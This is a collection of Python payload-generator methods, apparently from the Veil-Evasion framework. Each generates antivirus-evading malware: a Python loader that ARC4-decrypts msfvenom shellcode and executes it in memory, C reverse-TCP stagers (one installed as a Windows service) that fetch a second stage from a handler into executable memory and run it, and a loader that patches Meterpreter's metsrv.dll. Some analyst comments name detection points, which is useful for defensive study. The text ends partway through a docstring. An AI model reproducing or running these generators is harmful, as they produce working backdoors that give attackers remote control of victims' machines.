			if self.required_options["use_pyherion"][0].lower() == "y":
				PayloadCode = crypters.pyherion(PayloadCode)

			return PayloadCode

		else:
			# Generate Shellcode Using msfvenom
			Shellcode = self.shellcode.generate()
		
			# Generate Random Variable Names
			RandPtr = randomizer.randomString()
			RandBuf = randomizer.randomString()
			RandHt = randomizer.randomString()
			ShellcodeVariableName = randomizer.randomString()
			RandIV = randomizer.randomString()
			RandARCKey = randomizer.randomString()
			RandARCPayload = randomizer.randomString()
			RandEncShellCodePayload = randomizer.randomString()
			RandShellcode = randomizer.randomString()
			RandReverseShell = randomizer.randomString()
			RandMemoryShell = randomizer.randomString()
				
			# 8-byte IV (unused by ARC4) and 8-byte ARC4 key
			iv = randomizer.randomKey(8)
			ARCKey = randomizer.randomKey(8)

			# ARC4 stream cipher (the original comment said DES); encrypt the shellcode
			arc4main = ARC4.new(ARCKey)
			EncShellCode = arc4main.encrypt(Shellcode)
		
			# emitted script: decrypt into a str, copy it into a ctypes string
			# buffer, cast the buffer to a function pointer and call it.
			# RandPtr/RandBuf/RandHt/RandReverseShell are generated but unused here.
			PayloadCode = 'from Crypto.Cipher import ARC4\n'
			PayloadCode += 'from ctypes import *\n'
			PayloadCode += RandIV + ' = \'' + iv + '\'\n'
			PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
			PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
			PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
			PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
			PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
			PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
			PayloadCode += RandShellcode + '()'

			# optional outer wrapping by the pyherion crypter
			if self.required_options["use_pyherion"][0].lower() == "y":
				PayloadCode = crypters.pyherion(PayloadCode)

			return PayloadCode
    def generate(self):
        """Return C source for a Windows service executable that acts as a reverse-TCP stager.

        The emitted program registers itself as a service (random service name,
        ``ServiceMain`` / ``ControlHandler``), connects to
        ``self.required_options["LHOST"]``:``["LPORT"]``, reads a 4-byte length,
        allocates a PAGE_EXECUTE_READWRITE buffer of that length plus 5, writes
        ``0xBF`` followed by the 4-byte socket handle at the start of the buffer,
        receives the rest of the stage after that 5-byte prefix and jumps to the
        buffer.  While the service state stays SERVICE_RUNNING the loop repeats.
        Around this core it interleaves "logical nop" string functions, decoy
        ``#include`` lines and large ``malloc`` loops, and randomizes identifier
        names and statement order with ``random.shuffle`` so each build differs
        textually.

        Returns:
            str: the generated C source.  Python 2 only (``xrange``, integer ``/``
            on ``len(randString1)/2``).

        Analyst note: the functional core is the same in every build -- a
        service that opens an outbound TCP connection, receives a length-prefixed
        blob into a freshly allocated RWX region and executes it.  Two local
        names in the emitted receive loop (``slfkmklsDSA`` / ``rcAmwSVM``) are
        hard-coded rather than randomized and therefore survive as constant
        strings in every generated binary.
        """
            
        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()
        
        # the real includes needed
        includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
        
        # size limits for the decoy string arrays/buffers: up to 10000 strings of
        # up to 10000 bytes each, per array
        global_max_string_length = 10000
        max_string_length = random.randint(1,global_max_string_length)
        max_num_strings = 10000
        
        
        # decoy string helpers (reverse / double each character); they are called
        # by the decoy string-generation functions below and contribute nothing
        # to the stager logic
        randName1 = randomizer.randomString() # reverse()
        randName2 = randomizer.randomString() # doubles characters
        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
                                (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                            ]
                            
        random.shuffle(stringModFunctions)
        
        # obfuscation - "logical nop" string generation functions; each wraps one
        # of the decoy helpers and a random 50-char literal
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()
        stringGenFunctions = [  (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[len(randString1)/2])),
                                (randName2, "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, randomizer.randomString(50), randVar3, randomizer.randomString(50), stringModFunctions[1][0], randVar2, randVar3)),
                                (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, randomizer.randomString(50), randVar5, randVar4, randVar5))
                             ]
        random.shuffle(stringGenFunctions)
        
        # obfuscation - decoy includes.  `t` is assigned but never used; the loop
        # appends fake_includes[1 .. k-1] for a random k in 1..7, so index 0 is
        # never chosen and k == 1 adds none
        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
                        "#include <limits.h>", "#include <assert.h>"]
        t = random.randint(1,7)
        for x in xrange(1, random.randint(1,7)):
            includes.append(fake_includes[x])
        
        # obsufcation - shuffle up our real and fake includes
        random.shuffle(includes)

        # winsock2.h must precede windows.h, hence it is emitted before the shuffled list
        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"
        
            
        # real - service globals and prototypes (order shuffled); hStatusName is
        # the SERVICE_STATUS_HANDLE used by ServiceMain and ControlHandler
        hStatusName = randomizer.randomString()
        serviceHeaders = ["SERVICE_STATUS ServiceStatus;","SERVICE_STATUS_HANDLE %s;" %(hStatusName), "void  ServiceMain(int argc, char** argv);", "void  ControlHandler(DWORD request);"]
        random.shuffle(serviceHeaders)
        
        code += "\n".join(serviceHeaders)
        
        # obsufcation - string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"
        
        # real - winsock_init: WSAStartup with MAKEWORD(2, 2); helpers.obfuscateNum(n, k)
        # presumably emits an expression evaluating to n.  Failure exits the process.
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4),helpers.obfuscateNum(2,4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
        
        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"
        
        # real - punt: close the socket, tear down winsock and exit(1) -- this
        # terminates the whole service process, it does not return to the caller
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
        code += "closesocket(%s);" %(my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"
        
        # obsufcation - second logical nop string function
        code += stringGenFunctions[1][1] + "\n"
        
        # real - recv_all: loop on recv() until len bytes have arrived; punts on
        # SOCKET_ERROR.  The two counters are hard-coded names (not randomized).
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name)
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        code += "void * startb = %s;" %(buffer_name)
        code += "while (rcAmwSVM < %s) {" %(len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name)

        # obsufcation - third logical nop string function
        code += stringGenFunctions[2][1] + "\n"

        # real - wsconnect: resolve LHOST with gethostbyname and connect a TCP
        # socket to LPORT.  Host and (obfuscated) port are baked into the binary,
        # so the handler address is a static artifact of every build.
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name);
        code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" %(sock_name)
        code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" %(my_socket_name)
        
        
        # real - main(): hand control to the SCM via StartServiceCtrlDispatcher
        # with a random service name (the ServiceTable assignments are shuffled)
        serviceName = randomizer.randomString()
        code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
        serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName), 
                                "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
                                "ServiceTable[1].lpServiceName = NULL;",
                                "ServiceTable[1].lpServiceProc = NULL;"]
        random.shuffle(serviceTableEntries)
        code += "\n".join(serviceTableEntries)
        code += "StartServiceCtrlDispatcher(ServiceTable);}\n"
        

        # real - service status initialisation (order shuffled); accepts STOP and SHUTDOWN
        serviceStatusOptions = ["ServiceStatus.dwWin32ExitCode = 0;",
                                "ServiceStatus.dwCurrentState = SERVICE_START_PENDING;",
                                "ServiceStatus.dwWaitHint = 0;",
                                "ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;",
                                "ServiceStatus.dwServiceSpecificExitCode = 0;",
                                "ServiceStatus.dwCheckPoint = 0;",
                                "ServiceStatus.dwServiceType = SERVICE_WIN32;"]
        random.shuffle(serviceStatusOptions)
        
        # real - ServiceMain: register the control handler under the random
        # service name, report SERVICE_RUNNING, then enter the stager loop
        code += "void ServiceMain(int argc, char** argv) {\n"
        code += "\n".join(serviceStatusOptions)
        
        code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" %(hStatusName, serviceName)
        code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" %(hStatusName)
        code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
        code += "SetServiceStatus (%s, &ServiceStatus);" %(hStatusName)
        
        # the whole connect/receive/execute sequence below runs once per loop
        # iteration, so after the received code returns it reconnects
        code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"
        
        # obsufcation - random variable names
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()
        
        # obsufcation - three decoy char* arrays, each 1..max_num_strings entries
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1,max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1,max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1,max_num_strings)
        
        # real - necessary declarations: stage size, stage buffer, function pointer
        code += "ULONG32 %s;" %(size_name)
        code += "char * %s;" %(buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" %(function_name)
        
        # obsufcation - malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
        
        # real - init winsock and connect back to the handler
        code += "%s();" %(winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
        
        # obsufcation - malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
        
        # real - receive the 4-byte stage length from the handler
        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2))
        # real - punt unless exactly 4 bytes arrived and the length is positive
        code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
        
        # real - RWX allocation of size + 5 (room for the 5-byte prefix below);
        # an executable heap region created from a network-sized value is the
        # main host-side detection point of this stager
        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2))
        
        # obsufcation - declare space for our 3 string obfuscation array
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
        
        # obsufcation - first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
        
        # real - check if the buffer received is null, if so punt the socket
        code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
        
        # real - 5-byte prefix: 0xBF followed by the 4-byte socket handle.  0xBF
        # with a 32-bit immediate is the x86 encoding of `mov edi, imm32`, so the
        # received stage presumably expects the socket in EDI (the original
        # comment's "push" wording is inaccurate)
        code += "%s[0] = 0xBF;" %(buffer_name)
        # real-  copy the 4 magic bytes into the buffer
        code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2))
        
        # obsufcation - malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
        
        # obsufcation - second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
        
        # real - receive the stage into buffer + 5, cast the buffer to a function
        # pointer and call it
        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) 
        code += "%s = (void (*)())%s;" %(function_name, buffer_name)
        code += "%s();" %(function_name)
        
        # obsufcation - third string obfuscation method (only reached if the stage returns)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
        
        code += "} return; }\n"

        # service control handler: STOP and SHUTDOWN set SERVICE_STOPPED, which
        # also ends the while loop in ServiceMain; anything else re-reports the
        # current status
        code += """void ControlHandler(DWORD request) 
    { 
        switch(request) 
        { 
            case SERVICE_CONTROL_STOP: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            case SERVICE_CONTROL_SHUTDOWN: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            default:
                break;
        } 
        SetServiceStatus (%s,  &ServiceStatus);
        return; 
    } 
    """ %(hStatusName, hStatusName, hStatusName)

        return code
    def generate(self):
            
        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()
        
        # the real includes needed
        includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
        
        # max length string for obfuscation
        global_max_string_length = 10000
        max_string_length = random.randint(1,global_max_string_length)
        max_num_strings = 10000
        
        # TODO: add in more string processing functions
        randName1 = randomizer.randomString() # reverse()
        randName2 = randomizer.randomString() # doubles characters
        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
                                (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                            ]
                            
        random.shuffle(stringModFunctions)
        
        # obfuscation "logical nop" string generation functions
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()

        stringGenFunctions = [  (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[len(randString1)/2])),
                                (randName2, "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, randomizer.randomString(50), randVar3, randomizer.randomString(50), stringModFunctions[1][0], randVar2, randVar3)),
                                (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, randomizer.randomString(50), randVar5, randVar4, randVar5))
                             ]
        random.shuffle(stringGenFunctions)
        
        # obfuscation - add in our fake includes
        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
                        "#include <limits.h>", "#include <assert.h>"]
        t = random.randint(1,7)
        for x in xrange(1, random.randint(1,7)):
            includes.append(fake_includes[x])
        
        # shuffle up real/fake includes
        random.shuffle(includes)
        
        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"

        #string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"
        
        # build the winsock_init function
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4), helpers.obfuscateNum(2,4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
        
        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"
        
        # build punt function
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
        code += "closesocket(%s);" %(my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"
        
        # second logical nop string function
        code += stringGenFunctions[1][1] + "\n"
        
        # build recv_all function
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name)
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        code += "void * startb = %s;" %(buffer_name)
        code += "while (rcAmwSVM < %s) {" %(len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name)

        # third logical nop string function
        code += stringGenFunctions[2][1] + "\n"
        
        # build wsconnect function
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name);
        code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" %(sock_name)
        code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" %(my_socket_name)
        
        # build main() code
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()
        
        # obfuscation stuff
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1,max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1,max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1,max_num_strings)
        
        code += "int main(int argc, char * argv[]) {"
        code += "ShowWindow( GetConsoleWindow(), SW_HIDE );"
        code += "ULONG32 %s;" %(size_name)
        code += "char * %s;" %(buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" %(function_name)
        
        # malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
        
        code += "%s();" %(winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
        
        # malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
        
        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2))
        code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
        
        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2))
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
        
        # first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
        
        # real code
        code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
        code += "%s[0] = 0xBF;" %(buffer_name)
        code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2))
        
        # malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
        
        # second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
        
        # real code
        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) 
        code += "%s = (void (*)())%s;" %(function_name, buffer_name)
        code += "%s();" %(function_name)
        
        # third string obfuscation method (never called)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
        
        code += "return 0;}\n"

        return code
Example #29
    def generate(self):
        """Build a Python loader around a patched Metasploit ``metsrv.dll``.

        Reads the DLL from ``veil.METASPLOIT_PATH``, overwrites a set of
        marker-located fields inside it (header stub, user agent, transport,
        handler URL, two timeouts), deflates it with ``helpers.deflate`` and
        emits Python source that base64-decodes, inflates and calls the blob
        through ``ctypes``.

        Reads ``self.required_options['LHOST']``, ``['LPORT']`` and
        ``["use_encrypter"]`` and calls ``self.genHTTPChecksum()``.
        Returns the generated Python source as a str.  ``str.index`` raises
        ``ValueError`` if a marker is absent from the DLL; ``open`` raises
        ``IOError`` if the DLL is missing.  Python 2 str/bytes semantics are
        assumed throughout (``struct.pack`` output is mixed with str literals).
        """
        
        metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
        
        # NOTE(review): not a ``with`` block -- the handle leaks if read() raises.
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()
        
        # In-place overwrite helper: replaces len(s) bytes at offset ind with s,
        # so the overall length of the DLL never changes (used to patch metsrv.dll).
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header: the first 48 bytes (DOS header region) are
        # overwritten with a code stub; the literal keeps the leading "MZ" bytes

        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
        headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string (located via the
        # NUL-terminated "METERPRETER_UA" marker)
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL: swap the transport marker from ..._SSL to ..._HTTP
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler: the placeholder is "https://"
        # followed by 256 'X' characters; the written value is a plain http://
        # URL whose path is genHTTPChecksum() plus a random 16-character suffix
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration timeout: the little-endian placeholder
        # 0xb64be661 is overwritten with 604800 (presumably seconds, i.e. 7 days)
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout: placeholder 0xaf79257f -> 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll (helpers.deflate); the loader emitted
        # below reverses this with base64.b64decode + zlib.decompress(.., -15)
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload (Python source, accumulated as a string)
        payloadCode = ""
        
        # imports needed by the generated loader (ctypes for the void * cast)
        payloadCode += "from ctypes import *\nimport base64,zlib\n"

        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()

        # emitted inflate helper: base64-decode, then raw-DEFLATE inflate (wbits=-15)
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

        # randVarName is intentionally re-drawn: the name used inside the helper
        # and the module-level name holding the inflated blob are independent
        randVarName = randomizer.randomString()
        randFuncName = randomizer.randomString()
        
        # inflate the embedded blob, cast it to a C function pointer and call it
        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName+"()\n"
        
        # optionally wrap the whole loader with the pyherion crypter
        if self.required_options["use_encrypter"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
Example #30
	def generate(self):
		"""Build a Python shellcode loader whose embedded payload string has one
		hex letter swapped for a non-hex letter.

		The msfvenom shellcode (``self.shellcode.generate()``) is string-escaped,
		then one letter from "abcdef" is translated to one letter from
		``non_hex_letters`` with ``string.maketrans``; the emitted loader
		rebuilds the inverse table and translates it back before decoding.
		``self.required_options["inject_method"]`` selects between a
